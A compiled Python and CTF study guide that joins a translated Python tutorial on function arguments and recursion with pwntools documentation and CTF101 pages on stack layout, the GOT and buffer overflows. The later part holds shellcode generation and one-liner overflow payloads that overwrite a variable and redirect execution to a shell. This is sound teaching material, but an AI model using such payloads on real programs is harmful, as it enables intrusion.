>>> calc(nums[0], nums[1], nums[2])
14
The problem is that it's too cumbersome, so Python allows you to add a *
sign in front of a list or tuple and pass the elements of the list or tuple as mutable arguments.
>>> nums = [1, 2, 3]
>>> calc(*nums)
14
*nums
means that all elements of the list nums
are passed in as mutable arguments. This writing style is quite useful and common.
Keyword arguments
Variable arguments allow you to pass in zero or any number of arguments, which are automatically assembled into a tuple when the function is called, while keyword arguments allow you to pass in zero or any number of arguments with parameter names, which are automatically assembled into a dict inside the function. see the example.
def person(name, age, **kw):
print('name:', name, 'age:', age, 'other:', kw)
The function person
accepts the keyword argument kw
in addition to the mandatory arguments name
and age
. When calling this function, only the mandatory parameters can be passed.
>>> person('Michael', 30)
name: Michael age: 30 other: {}
Any number of keyword parameters can also be passed in.
>>> person('Bob', 35, city='Beijing')
name: Bob age: 35 other: {'city': 'Beijing'}
>>> person('Adam', 45, gender='M', job='Engineer')
name: Adam age: 45 other: {'gender': 'M', 'job': 'Engineer'}
What is the use of the keyword argument? It extends the function's functionality. For example, in the person
function, we are guaranteed to receive the two parameters name
and age
, but if the caller would like to provide more parameters, we can receive them as well. Imagine you are doing a user registration function and everything is optional except for the user name and age which are required, using keyword arguments to define this function will satisfy the registration requirement.
Similar to variable parameters, you can also assemble a dict first, and then, convert that dict to a keyword parameter to pass in.
>>> extra = {'city': 'Beijing', 'job': 'Engineer'}
>>> person('Jack', 24, city=extra['city'], job=extra['job'])
name: Jack age: 24 other: {'city': 'Beijing', 'job': 'Engineer'}
Of course, the above complex call can be written in a simplified way as follows.
>>> extra = {'city': 'Beijing', 'job': 'Engineer'}
>>> person('Jack', 24, **extra)
name: Jack age: 24 other: {'city': 'Beijing', 'job': 'Engineer'}
**extra
means that all key-values of the dict extra
are passed into the **kw
parameter of the function with keyword arguments, kw
will get a dict, note that the dict obtained by kw
is a copy of extra
, changes to kw
will not affect extra
outside the function.
Naming keyword arguments
For keyword arguments, the caller of a function can pass in any unrestricted keyword argument. As for exactly what is passed in, it needs to be checked inside the function via kw
.
Still using the person()
function as an example, we want to check for city
and job
parameters.
def person(name, age, **kw):
if 'city' in kw:
# With city parameter
pass
if 'job' in kw:
# With job parameter
pass
print('name:', name, 'age:', age, 'other:', kw)
However, the caller can still pass in unrestricted keyword arguments.
>>> person('Jack', 24, city='Beijing', addr='Chaoyang', zipcode=123456)
If you want to restrict the names of the keyword arguments, you can use named keyword arguments, for example, to receive only city
and job
as keyword arguments. The functions defined in this way are as follows.
def person(name, age, *, city, job):
print(name, age, city, job)
Unlike the keyword parameter **kw
, the named keyword parameter requires a special separator *
, and the parameters following *
are considered as named keyword parameters.
It is called as follows.
>>> person('Jack', 24, city='Beijing', job='Engineer')
Jack 24 Beijing Engineer
If a function definition already has a variable argument, the named keyword argument that follows no longer needs a special separator *
.
def person(name, age, *args, city, job):
print(name, age, args, city, job)
Named keyword parameters must be passed with a parameter name, unlike positional parameters. If the parameter name is not passed, the call will report an error.
>>> person('Jack', 24, 'Beijing', 'Engineer')
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
TypeError: person() missing 2 required keyword-only arguments: 'city' and 'job'
Due to the missing parameter names city
and job
in the call, the Python interpreter treats the first two parameters as positional parameters and passes the last two parameters to *args
, but the missing named keyword parameter causes an error.
Named keyword arguments can have default values, thus simplifying the call.
def person(name, age, *, city='Beijing', job):
print(name, age, city, job)
Since the named keyword parameter city
has a default value, it can be invoked without passing the city
parameter.
>>> person('Jack', 24, job='Engineer')
Jack 24 Beijing Engineer
When using named keyword arguments, take special care to add a *
as a special separator if there are no variable arguments. If *
is missing, the Python interpreter will not recognize positional and named keyword arguments.
def person(name, age, city, job):
# Missing *, city and job are considered as location parameters
pass
Parameter combinations
To define functions in Python, you can use mandatory parameters, default parameters, variable parameters, keyword parameters, and named keyword parameters, all five of which can be used in combination. However, please note that the order of parameter definition must be: mandatory parameters, default parameters, variable parameters, named keyword parameters, and keyword parameters.
For example, to define a function with several of these parameters.
def f1(a, b, c=0, *args, **kw):
print('a =', a, 'b =', b, 'c =', c, 'args =', args, 'kw =', kw)
def f2(a, b, c=0, *, d, **kw):
print('a =', a, 'b =', b, 'c =', c, 'd =', d, 'kw =', kw)
When the function is called, the Python interpreter automatically passes in the corresponding arguments according to their positions and names.
>>> f1(1, 2)
a = 1 b = 2 c = 0 args = () kw = {}
>>> f1(1, 2, c=3)
a = 1 b = 2 c = 3 args = () kw = {}
>>> f1(1, 2, 3, 'a', 'b')
a = 1 b = 2 c = 3 args = ('a', 'b') kw = {}
>>> f1(1, 2, 3, 'a', 'b', x=99)
a = 1 b = 2 c = 3 args = ('a', 'b') kw = {'x': 99}
>>> f2(1, 2, d=99, ext=None)
a = 1 b = 2 c = 0 d = 99 kw = {'ext': None}
The most amazing thing is that with a tuples and dict you can also call the above functions.
>>> args = (1, 2, 3, 4)
>>> kw = {'d': 99, 'x': '#'}
>>> f1(*args, **kw)
a = 1 b = 2 c = 3 args = (4,) kw = {'d': 99, 'x': '#'}
>>> args = (1, 2, 3)
>>> kw = {'d': 88, 'x': '#'}
>>> f2(*args, **kw)
a = 1 b = 2 c = 3 d = 88 kw = {'x': '#'}
So, for any function, you can call it by something like func(*args, **kw)
, regardless of how its arguments are defined.
Although it is possible to combine up to 5 arguments, do not use too many combinations at the same time, otherwise the function interface is poorly understandable.
Summary
Python's functions have a very flexible argument form, allowing both simple calls and very complex arguments to be passed in.
The default argument must be an immutable object; if it's a mutable object, the program will run with a logic error!
Note the syntax for defining mutable and keyword arguments.
*args
is a mutable parameter, args receives a tuples.
**kw
is a keyword argument, kw receives a dict.
And the syntax of how to pass variable and keyword arguments when calling a function.
Variable parameters can be passed either directly: func(1, 2, 3)
or by assembling a list or tuple first and then passing it through *args
: func(*(1, 2, 3))
.
Keyword arguments can either be passed directly: func(a=1, b=2)
, or assembled first in a dict and then passed in via *kw
: func(**{'a': 1, 'b': 2})
.
Using *args
and **kw
is the customary way of writing Python, but of course other parameter names can be used, but it is better to use the customary usage.
Named keyword arguments are intended to limit the parameter names that can be passed in by the caller, while providing default values.
Don't forget to write the separator *
when defining named keyword parameters without mutable parameters, otherwise the definition will be a positional parameter.
Reference source code
Recursive functions
Inside a function, other functions can be called. If a function calls itself internally, that function is recursive.
As an example, let's calculate the factorial n! = 1 x 2 x 3 x ... x n
, represented by the function fact(n)
, it can be seen that
So, fact(n)
can be expressed as n x fact(n-1)
, with special treatment required only for n=1.
Thus, fact(n)
is written out recursively as.
def fact(n):
if n==1:
return 1
return n * fact(n - 1)
The above is a recursive function. Try:
>>> fact(1)
1
>>> fact(5)
120
>>> fact(100)
93326215443944152681699238856266700490715968264381621468592963895217599993229915608941463976156518286253697920827223758251185210916864000000000000000000000000
If we calculate fact(5)
, we can see the calculation process according to the function definition as follows.
===> fact(5)
===> 5 * fact(4)
===> 5 * (4 * fact(3))
===> 5 * (4 * (3 * fact(2)))
===> 5 * (4 * (3 * (2 * fact(1))))
===> 5 * (4 * (3 * (2 * 1)))
===> 5 * (4 * (3 * 2))
===> 5 * (4 * 6)
===> 5 * 24
===> 120
Recursive functions have the advantage of being simple to define and logically clear. In theory, all recursive functions can be written as loops, but the logic of loops is not as clear as recursion.
Using recursive functions requires care to prevent stack overflows. In computers, function calls are implemented through a data structure called a stack. Whenever a function call is entered, a layer of stack frames is added to the stack, and whenever the function returns, a layer of stack frames is subtracted from the stack. Since the size of the stack is not infinite, too many recursive calls can cause the stack to overflow. Try fact(1000)
.
>>> fact(1000)
Traceback (most recent call last):
File "<stdin>", line 1, in <module>
File "<stdin>", line 4, in fact
...
File "<stdin>", line 4, in fact
RuntimeError: maximum recursion depth exceeded in comparison
The solution to recursive call stack overflow is to optimize it by tail recursion. In fact, tail recursion has the same effect as a loop, so it is okay to think of a loop as a special kind of tail recursive function.
Tail recursion means that the function itself is called when it returns, and, the return statement cannot contain an expression. In this way, the compiler or interpreter can optimize the tail recursion so that the recursion itself, no matter how many times it is called, only occupies one stack frame and no stack overflow occurs.
The fact(n)
function above is not tail recursive because return n * fact(n - 1)
introduces a multiplicative expression. To change to a tail recursive approach, a little more code is needed, mainly to pass the product of each step into the recursive function.
def fact(n):
return fact_iter(n, 1)
def fact_iter(num, product):
if num == 1:
return product
return fact_iter(num - 1, num * product)
As you can see, return fact_iter(num - 1, num * product)
returns only the recursive function itself, num - 1
and num * product
are calculated before the function call and do not affect the function call.
The call to fact(5)
corresponding to fact_iter(5, 1)
is as follows.
===> fact_iter(5, 1)
===> fact_iter(4, 5)
===> fact_iter(3, 20)
===> fact_iter(2, 60)
===> fact_iter(1, 120)
===> 120
When tail recursive calls are made, the stack does not grow if optimizations are made, so no matter how many calls are made, it will not cause the stack to overflow.
Unfortunately, most programming languages are not optimized for tail recursion, and neither is the Python interpreter, so even if you change the fact(n)
function above to a tail recursive approach, it will still result in a stack overflow.
Summary
The advantage of using recursive functions is that the logic is simple and clear, and the disadvantage is that calls that are too deep can lead to stack overflow.
Languages optimized for tail recursion can prevent stack overflows by tail recursion. Tail recursion is in fact equivalent to looping, and programming languages that don't have looping statements can only implement loops via tail recursion.
Python's standard interpreter is not optimized for tail recursion, and any recursive function has a stack overflow problem.
Reference source code
Python Programming Quick Guide - CTF Related
https://yulizi123.github.io/tutorials/python-basic/basic/
https://docs.python.org/3/
https://docs.pwntools.com/en/stable/
Module installation
There are many ways to install external modules, and the form of installation varies from system to system. Installing Python packages on Windows, for example, might even kill you. Haha.
What is an external module?
An external module is what you use when you import
something into a python script.
import numpy as np
import matplotlib.pyplot as plt
Numpy and matplotlib are both external modules that need to be installed. They are not part of python's own modules.
Installing Numpy
For example, there are many ways to install modules for scientific operations, such as numpy. On Windows, the easiest way is to install Anaconda, which has many necessary external modules. Install one, and save yourself the trouble of installing others.
However, I want to talk about downloading the installation package and installing it on Windows. For example, on the Numpy installer website, you can find various versions of numpy.
In NumPy 1.10.2, we can find installers for Windows, but no Windows installers have been added to the new version yet. Then choose the appropriate "exe" installer for your system and python version. Download and install.
If you are on MacOS or Linux, this external module is much easier to install. You can easily install it by typing a phrase into your computer's Terminal. Windows seems to have to be set up in a special way to do the same thing, I don't know... you might want to look it up. On my computer, the Terminal looks like this.
Then you can install it if you type in this form.
$ pip install the name of the module you want
For example
$ pip install numpy # This is for the python2+ version
$ pip3 install numpy # This is for the python3+ version
Updating external modules
Updating external modules with pip is very simple. All you need to do is type the following command into Terminal. The -U
here means update.
$ pip install -U numpy # This is for the python2+ version
$ pip3 install -U numpy # This is for the python3+ version
pwntools
pwntools
is a CTF framework and exploit development library. Written in Python, it is designed for rapid prototyping and development, and intended to make exploit writing as simple as possible.
The primary location for this documentation is docs.pwntools.com, which uses readthedocs. It comes in three primary flavors:
Installation
Pwntools is best supported on 64-bit Ubuntu LTS releases (14.04, 16.04, 18.04, and 20.04). Most functionality should work on any Posix-like distribution (Debian, Arch, FreeBSD, OSX, etc.).
Prerequisites
To get the most out of pwntools
, you should install the following system libraries.
- Binutils
- Python Development Headers
Released Version
pwntools is available as a pip
package for both Python2 and Python3.
Python3
$ apt-get update
$ apt-get install python3 python3-pip python3-dev git libssl-dev libffi-dev build-essential
$ python3 -m pip install --upgrade pip
$ python3 -m pip install --upgrade pwntools
Python2 (Deprecated)
NOTE: Pwntools maintainers STRONGLY recommend using Python3 for all future Pwntools-based scripts and projects.
Additionally, due to pip dropping support for Python2, a specific version of pip must be installed.
$ apt-get update
$ apt-get install python python-pip python-dev git libssl-dev libffi-dev build-essential
$ python2 -m pip install --upgrade pip==20.3.4
$ python2 -m pip install --upgrade pwntools
Command-Line Tools
When installed with sudo
the above commands will install Pwntools’ command-line tools to somewhere like /usr/bin
.
However, if you run as an unprivileged user, you may see a warning message that looks like this:
Follow the instructions listed and add ~/.local/bin
to your $PATH
environment variable.
Development
If you are hacking on Pwntools locally, you’ll want to do something like this:
$ git clone https://github.com/Gallopsled/pwntools
$ pip install --upgrade --editable ./pwntools
Getting Started
To get your feet wet with pwntools, let’s first go through a few examples.
When writing exploits, pwntools generally follows the “kitchen sink” approach.
>>> from pwn import *
This imports a lot of functionality into the global namespace. You can now assemble, disassemble, pack, unpack, and many other things with a single function.
A full list of everything that is imported is available from pwn import *.
Tutorials
A series of tutorials for Pwntools exists online, at https://github.com/Gallopsled/pwntools-tutorial#readme
Making Connections
You need to talk to the challenge binary in order to pwn it, right? pwntools makes this stupid simple with its pwnlib.tubes
module.
This exposes a standard interface to talk to processes, sockets, serial ports, and all manner of things, along with some nifty helpers for common tasks. For example, remote connections via pwnlib.tubes.remote
.
>>> conn = remote('ftp.ubuntu.com',21)
>>> conn.recvline() # doctest: +ELLIPSIS
b'220 ...'
>>> conn.send(b'USER anonymous\r\n')
>>> conn.recvuntil(b' ', drop=True)
b'331'
>>> conn.recvline()
b'Please specify the password.\r\n'
>>> conn.close()
It’s also easy to spin up a listener
>>> l = listen()
>>> r = remote('localhost', l.lport)
>>> c = l.wait_for_connection()
>>> r.send(b'hello')
>>> c.recv()
b'hello'
Interacting with processes is easy thanks to the pwnlib.tubes.process
.
>>> sh = process('/bin/sh')
>>> sh.sendline(b'sleep 3; echo hello world;')
>>> sh.recvline(timeout=1)
b''
>>> sh.recvline(timeout=5)
b'hello world\n'
>>> sh.close()
Not only can you interact with processes programmatically, but you can actually interact with processes.
>>> sh.interactive() # doctest: +SKIP
$ whoami
user
There’s even an SSH module for when you’ve got to SSH into a box to perform a local/setuid exploit with pwnlib.tubes.ssh
. You can quickly spawn processes and grab the output, or spawn a process and interact with it like a process
tube.
>>> shell = ssh('bandit0', 'bandit.labs.overthewire.org', password='bandit0', port=2220)
>>> shell['whoami']
b'bandit0'
>>> shell.download_file('/etc/motd')
>>> sh = shell.run('sh')
>>> sh.sendline(b'sleep 3; echo hello world;')
>>> sh.recvline(timeout=1)
b''
>>> sh.recvline(timeout=5)
b'hello world\n'
>>> shell.close()
Packing Integers
A common task for exploit-writing is converting between integers as Python sees them, and their representation as a sequence of bytes. Usually, folks resort to the built-in struct
module.
pwntools makes this easier with pwnlib.util.packing
. No more remembering unpacking codes, and littering your code with helper routines.
>>> import struct
>>> p32(0xdeadbeef) == struct.pack('I', 0xdeadbeef)
True
>>> leet = unhex('37130000')
>>> u32(b'abcd') == struct.unpack('I', b'abcd')[0]
True
The packing/unpacking operations are defined for many common bit-widths.
>>> u8(b'A') == 0x41
True
Setting the Target Architecture and OS
The target architecture can generally be specified as an argument to the routine that requires it.
>>> asm('nop')
b'\x90'
>>> asm('nop', arch='arm')
b'\x00\xf0 \xe3'
However, it can also be set once in the global context
. The operating system, word size, and endianness can also be set here.
>>> context.arch = 'i386'
>>> context.os = 'linux'
>>> context.endian = 'little'
>>> context.word_size = 32
Additionally, you can use a shorthand to set all of the values at once.
>>> asm('nop')
b'\x90'
>>> context(arch='arm', os='linux', endian='big', word_size=32)
>>> asm('nop')
b'\xe3 \xf0\x00'
Setting Logging Verbosity
You can control the verbosity of the standard pwntools logging via context
.
For example, setting
>>> context.log_level = 'debug'
This will cause all of the data sent and received by a tube
to be printed on the screen.
Assembly and Disassembly
Never again will you need to run some already-assembled pile of shellcode from the internet! The pwnlib.asm
module is full of awesome.
>>> enhex(asm('mov eax, 0'))
'b800000000'
But if you do, it’s easy to suss out!
>>> print(disasm(unhex('6a0258cd80ebf9')))
0: 6a 02 push 0x2
2: 58 pop eax
3: cd 80 int 0x80
5: eb f9 jmp 0x0
However, you shouldn’t even need to write your own shellcode most of the time! pwntools comes with the pwnlib.shellcraft
module, which is loaded with useful time-saving shellcodes.
Let’s say that we want to setreuid(getuid(), getuid()) followed by duping file descriptor 4 to stdin, stdout, and stderr, and then pop a shell!
>>> enhex(asm(shellcraft.setreuid() + shellcraft.dupsh(4))) # doctest: +ELLIPSIS
'6a3158cd80...'
Misc Tools
Never write another hexdump, thanks to pwnlib.util.fiddling
.
Find offsets in your buffer that cause a crash, thanks to pwnlib.cyclic
.
>>> cyclic(20)
b'aaaabaaacaaadaaaeaaa'
>>> # Assume EIP = 0x62616166 (b'faab' which is pack(0x62616166)) at crash time
>>> cyclic_find(b'faab')
120
ELF Manipulation
Stop hard-coding things! Look them up at runtime with pwnlib.elf
.
>>> e = ELF('/bin/cat')
>>> print(hex(e.address)) #doctest: +SKIP
0x400000
>>> print(hex(e.symbols['write'])) #doctest: +SKIP
0x401680
>>> print(hex(e.got['write'])) #doctest: +SKIP
0x60b070
>>> print(hex(e.plt['write'])) #doctest: +SKIP
0x401680
You can even patch and save the files.
>>> e = ELF('/bin/cat')
>>> e.read(e.address, 4)
b'\x7fELF'
>>> e.asm(e.address, 'ret')
>>> e.save('/tmp/quiet-cat')
>>> disasm(open('/tmp/quiet-cat','rb').read(1))
' 0: c3 ret'
Binary Exploitation
https://ctf101.org/binary-exploitation/overview/
Binaries, or executables, are machine codes for a computer to execute. For the most part, the binaries that you will face in CTFs are Linux ELF files or the occasional Windows executable. Binary Exploitation is a broad topic within Cyber Security that really comes down to finding a vulnerability in the program and exploiting it to gain control of a shell or modifying the program's functions.
Common topics addressed by Binary Exploitation or 'pwn' challenges include:
- Registers
- The Stack
- Calling Conventions
- Global Offset Table (GOT)
- Buffers
- Buffer Overflow
- Return Oriented Programming (ROP)
- Binary Security
- No eXecute (NX)
- Address Space Layout Randomization (ASLR)
- Stack Canaries
- Relocation Read-Only (RELRO)
- The Heap
- Heap Exploitation
- Format String Vulnerability
Registers
A register is a location within the processor that is able to store data, much like RAM. Unlike RAM, however, accesses to registers are effectively instantaneous, whereas reads from main memory can take hundreds of CPU cycles to return.
Registers can hold any value: addresses (pointers), results from mathematical operations, characters, etc. Some registers are reserved however, meaning they have a special purpose and are not "general purpose registers" (GPRs). On x86, the only 2 reserved registers are rip
and rsp
which hold the address of the next instruction to execute and the address of the stack respectively.
On x86, the same register can have different-sized accesses for backward compatibility. For example, the rax
register is the full 64-bit register, eax
is the low 32 bits of rax
, ax
is the low 16 bits, al
is the low 8 bits, and ah
is the high 8 bits of ax
(bits 8-16 of rax
).
The Stack
In computer architecture, the stack is a hardware manifestation of the stack data structure (a Last In, First Out queue).
In x86, the stack is simply an area in RAM that was chosen to be the stack - there is no special hardware to store stack contents. The esp
/rsp
register holds the address in memory where the bottom of the stack resides. When something is push
ed to the stack, esp
decrements by 4 (or 8 on 64-bit x86), and the value that was push
ed is stored at that location in memory. Likewise, when a pop
instruction is executed, the value at esp
is retrieved (i.e. esp
is dereferenced), and esp
is then incremented by 4 (or 8).
N.B. The stack "grows" down to lower memory addresses!
Conventionally, ebp
/rbp
contains the address of the top of the current stack frame, and so sometimes local variables are referenced as an offset relative to ebp
rather than an offset to esp
. A stack frame is essentially just the space used on the stack by a given function.
Uses
The stack is primarily used for a few things:
- Storing function arguments
- Storing local variables
- Storing processor state between function calls
Example
Let's see what the stack looks like right after say_hi
has been called in this 32-bit x86 C program:
#include <stdio.h>
void say_hi(const char * name) {
printf("Hello %s!\n", name);
}
int main(int argc, char ** argv) {
char * name;
if (argc != 2) {
return 1;
}
name = argv[1];
say_hi(name);
return 0;
}
And the relevant assembly:
0804840b <say_hi>:
804840b: 55 push ebp
804840c: 89 e5 mov ebp,esp
804840e: 83 ec 08 sub esp,0x8
8048411: 83 ec 08 sub esp,0x8
8048414: ff 75 08 push DWORD PTR [ebp+0x8]
8048417: 68 f0 84 04 08 push 0x80484f0
804841c: e8 bf fe ff ff call 80482e0 <printf@plt>
8048421: 83 c4 10 add esp,0x10
8048424: 90 nop
8048425: c9 leave
8048426: c3 ret
08048427 <main>:
8048427: 8d 4c 24 04 lea ecx,[esp+0x4]
804842b: 83 e4 f0 and esp,0xfffffff0
804842e: ff 71 fc push DWORD PTR [ecx-0x4]
8048431: 55 push ebp
8048432: 89 e5 mov ebp,esp
8048434: 51 push ecx
8048435: 83 ec 14 sub esp,0x14
8048438: 89 c8 mov eax,ecx
804843a: 83 38 02 cmp DWORD PTR [eax],0x2
804843d: 74 07 je 8048446 <main+0x1f>
804843f: b8 01 00 00 00 mov eax,0x1
8048444: eb 1c jmp 8048462 <main+0x3b>
8048446: 8b 40 04 mov eax,DWORD PTR [eax+0x4]
8048449: 8b 40 04 mov eax,DWORD PTR [eax+0x4]
804844c: 89 45 f4 mov DWORD PTR [ebp-0xc],eax
804844f: 83 ec 0c sub esp,0xc
8048452: ff 75 f4 push DWORD PTR [ebp-0xc]
8048455: e8 b1 ff ff ff call 804840b <say_hi>
804845a: 83 c4 10 add esp,0x10
804845d: b8 00 00 00 00 mov eax,0x0
8048462: 8b 4d fc mov ecx,DWORD PTR [ebp-0x4]
8048465: c9 leave
8048466: 8d 61 fc lea esp,[ecx-0x4]
8048469: c3 ret
Skipping over the bulk of main
, you'll see that at 0x8048452
main
's name
local is pushed to the stack because it's the first argument to say_hi
. Then, a call
instruction is executed. call
instructions first push the current instruction pointer to the stack, then jump to their destination. So when the processor begins executing say_hi
at 0x0804840b
, the stack looks like this:
EIP = 0x0804840b (push ebp)
ESP = 0xffff0000
EBP = 0xffff002c
0xffff0004: 0xffffa0a0 // say_hi argument 1
ESP -> 0xffff0000: 0x0804845a // Return address for say_hi
The first thing say_hi
does is save the current ebp
so that when it returns, ebp
is back where main
expects it to be. The stack now looks like this:
EIP = 0x0804840c (mov ebp, esp)
ESP = 0xfffefffc
EBP = 0xffff002c
0xffff0004: 0xffffa0a0 // say_hi argument 1
0xffff0000: 0x0804845a // Return address for say_hi
ESP -> 0xfffefffc: 0xffff002c // Saved EBP
Again, note how esp
gets smaller when values are pushed to the stack.
Next, the current esp
is saved into ebp
, marking the top of the new stack frame.
EIP = 0x0804840e (sub esp, 0x8)
ESP = 0xfffefffc
EBP = 0xfffefffc
0xffff0004: 0xffffa0a0 // say_hi argument 1
0xffff0000: 0x0804845a // Return address for say_hi
ESP, EBP -> 0xfffefffc: 0xffff002c // Saved EBP
Then, the stack is "grown" to accommodate local variables inside say_hi
.
EIP = 0x08048414 (push [ebp + 0x8])
ESP = 0xfffeffec
EBP = 0xfffefffc
0xffff0004: 0xffffa0a0 // say_hi argument 1
0xffff0000: 0x0804845a // Return address for say_hi
EBP -> 0xfffefffc: 0xffff002c // Saved EBP
0xfffefff8: UNDEFINED
0xfffefff4: UNDEFINED
0xfffefff0: UNDEFINED
ESP -> 0xfffefffc: UNDEFINED
NOTE: stack space is not implicitly cleared!
Now, the 2 arguments to printf
are pushed in reverse order.
EIP = 0x0804841c (call printf@plt)
ESP = 0xfffeffe4
EBP = 0xfffefffc
0xffff0004: 0xffffa0a0 // say_hi argument 1
0xffff0000: 0x0804845a // Return address for say_hi
EBP -> 0xfffefffc: 0xffff002c // Saved EBP
0xfffefff8: UNDEFINED
0xfffefff4: UNDEFINED
0xfffefff0: UNDEFINED
0xfffeffec: UNDEFINED
0xfffeffe8: 0xffffa0a0 // printf argument 2
ESP -> 0xfffeffe4: 0x080484f0 // printf argument 1
Finally, printf
is called, which pushes the address of the next instruction to execute.
EIP = 0x080482e0
ESP = 0xfffeffe4
EBP = 0xfffefffc
0xffff0004: 0xffffa0a0 // say_hi argument 1
0xffff0000: 0x0804845a // Return address for say_hi
EBP -> 0xfffefffc: 0xffff002c // Saved EBP
0xfffefff8: UNDEFINED
0xfffefff4: UNDEFINED
0xfffefff0: UNDEFINED
0xfffeffec: UNDEFINED
0xfffeffe8: 0xffffa0a0 // printf argument 2
0xfffeffe4: 0x080484f0 // printf argument 1
ESP -> 0xfffeffe0: 0x08048421 // Return address for printf
Once printf
has returned, the leave
instruction moves ebp
into esp
, and pops the saved EBP.
EIP = 0x08048426 (ret)
ESP = 0xfffefffc
EBP = 0xffff002c
0xffff0004: 0xffffa0a0 // say_hi argument 1
ESP -> 0xffff0000: 0x0804845a // Return address for say_hi
And finally, ret
pops the saved instruction pointer into eip
which causes the program to return to main with the same esp
, ebp
, and stack contents as when say_hi
was initially called.
EIP = 0x0804845a (add esp, 0x10)
ESP = 0xffff0000
EBP = 0xffff002c
ESP -> 0xffff0004: 0xffffa0a0 // say_hi argument 1
Calling Conventions
To be able to call functions, there needs to be an agreed-upon way to pass arguments. If a program is entirely self-contained in a binary, the compiler would be free to decide the calling convention. However, in reality, shared libraries are used so that common code (e.g. libc) can be stored once and dynamically linked into programs that need it, reducing program size.
In Linux binaries, there are really only two commonly used calling conventions: cdecl for 32-bit binaries, and SysV for 64-bit
cdecl
In 32-bit binaries on Linux, function arguments are passed in on the stack in reverse order. A function like this:
int add(int a, int b, int c) {
return a + b + c;
}
would be invoked by pushing c
, then b
, then a
.
SysV
For 64-bit binaries, function arguments are first passed in certain registers:
- RDI
- RSI
- RDX
- RCX
- R8
- R9
then any leftover arguments are pushed onto the stack in reverse order, as in cdecl.
Other Conventions
Any method of passing arguments could be used as long as the compiler is aware of what the convention is. As a result, there have been many calling conventions in the past that aren't used frequently anymore. See Wikipedia for a comprehensive list.
GOT
The Global Offset Table (or GOT) is a section inside of programs that hold addresses of functions that are dynamically linked. As mentioned in the page on calling conventions, most programs don't include every function they use to reduce binary size. Instead, common functions (like those in libc) are "linked" into the program so they can be saved once on disk and reused by every program.
Unless a program is marked full RELRO, the resolution of the function to address in a dynamic library is done lazily. All dynamic libraries are loaded into memory along with the main program at launch, however, functions are not mapped to their actual code until they're first called. For example, in the following C snippet puts
won't be resolved to an address in libc until after it has been called once:
int main() {
puts("Hi there!");
puts("Ok bye now.");
return 0;
}
To avoid searching through shared libraries each time a function is called, the result of the lookup is saved into the GOT so future function calls "short circuit" straight to their implementation bypassing the dynamic resolver.
This has two important implications:
- The GOT contains pointers to libraries which move around due to ASLR
- The GOT is writable
These two facts will become very useful to use in Return Oriented Programming
PLT
Before the address of a function has been resolved, the GOT points to an entry in the Procedure Linkage Table (PLT). This is a small "stub" function that is responsible for calling the dynamic linker with (effectively) the name of the function that should be resolved.
Buffers
A buffer is any allocated space in memory where data (often user input) can be stored. For example, in the following C program name
would be considered a stack buffer:
#include <stdio.h>
int main() {
char name[64] = {0};
read(0, name, 63);
printf("Hello %s", name);
return 0;
}
Buffers could also be global variables:
#include <stdio.h>
char name[64] = {0};
int main() {
read(0, name, 63);
printf("Hello %s", name);
return 0;
}
Or dynamically allocated on the heap:
#include <stdio.h>
#include <stdlib.h>
int main() {
char *name = malloc(64);
memset(name, 0, 64);
read(0, name, 63);
printf("Hello %s", name);
return 0;
}
Exploits
Given that buffers commonly hold user input, mistakes when writing to them could result in attacker-controlled data being written outside of the buffer's space. See the page on buffer overflows for more.
Buffer Overflow
A Buffer Overflow is a vulnerability in which data can be written that exceeds the allocated space, allowing an attacker to overwrite other data.
Stack buffer overflow
The simplest and most common buffer overflow is one where the buffer is on the stack. Let's look at an example.
#include <stdio.h>
int main() {
int secret = 0xdeadbeef;
char name[100] = {0};
read(0, name, 0x100);
if (secret == 0x1337) {
puts("Wow! Here's a secret.");
} else {
puts("I guess you're not cool enough to see my secret");
}
}
There's a tiny mistake in this program which will allow us to see the secret. name
is decimal 100 bytes, however, we're reading in hex 100 bytes (=256 decimal bytes)! Let's see how we can use this to our advantage.
If the compiler chose to layout the stack like this:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0xdeadbeef // secret
...
0xffff0004: 0x0
ESP -> 0xffff0000: 0x0 // name
let's look at what happens when we read in 0x100 bytes of 'A's.
The first decimal 100 bytes are saved properly:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0xdeadbeef // secret
...
0xffff0004: 0x41414141
ESP -> 0xffff0000: 0x41414141 // name
However, when the 101st byte is read in, we see an issue:
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0xdeadbe41 // secret
...
0xffff0004: 0x41414141
ESP -> 0xffff0000: 0x41414141 // name
The least significant byte of the secret
has been overwritten! If we follow the next 3 bytes to be read in, we'll see the entirety of the secret
is "clobbered" with our 'A's
0xffff006c: 0xf7f7f7f7 // Saved EIP
0xffff0068: 0xffff0100 // Saved EBP
0xffff0064: 0x41414141 // secret
...
0xffff0004: 0x41414141
ESP -> 0xffff0000: 0x41414141 // name
The remaining 152 bytes would continue clobbering values up the stack.
Passing an impossible check
How can we use this to pass the seemingly impossible check in the original program? Well, if we carefully line up our input so that the bytes that overwrite the secret
happen to be the bytes that represent 0x1337 in Little Endian, we'll see the secret message.
A small Python one-liner will work nicely: python -c "print 'A'*100 + '\x31\x13\x00\x00'"
This will fill the name
buffer with 100 'A's, then overwrite the secret
with the 32-bit little-endian encoding of 0x1337.
Going one step further
As discussed on the stack page, the instruction that the current function should jump to when it is done is also saved on the stack (denoted as "Saved EIP" in the above stack diagrams). If we can overwrite this, we can control where the program jumps after the main
finishes running, giving us the ability to control what the program does entirely.
Usually, the end objective in binary exploitation is to get a shell (often called "popping a shell") on the remote computer. The shell provides us with an easy way to run anything we want on the target computer.
Say there happens to be a nice function that does this define somewhere else in the program that we normally can't get to:
void give_shell() {
system("/bin/sh");
}
Well with our buffer overflow knowledge, now we can! All we have to do is overwrite the saved EIP on the stack to the address where give_shell
is. Then, when the main returns, it will pop that address off of the stack and jump to it, running give_shell
, and giving us our shell.
Assuming give_shell
is at 0x08048fd0, we could use something like this: python -c "print 'A'*108 + '\xd0\x8f\x04\x08'"
We send 108 'A's to overwrite the 100 bytes that are allocated for the name
, the 4 bytes for secret
, and the 4 bytes for the saved EBP. Then we simply send the little-endian form of give_shell
's address, and we would get a shell!
This idea is extended on in Return Oriented Programming
Return Oriented Programming
Return Oriented Programming (or ROP) is the idea of chaining together small snippets of assembly with stack control to cause the program to do more complex things.
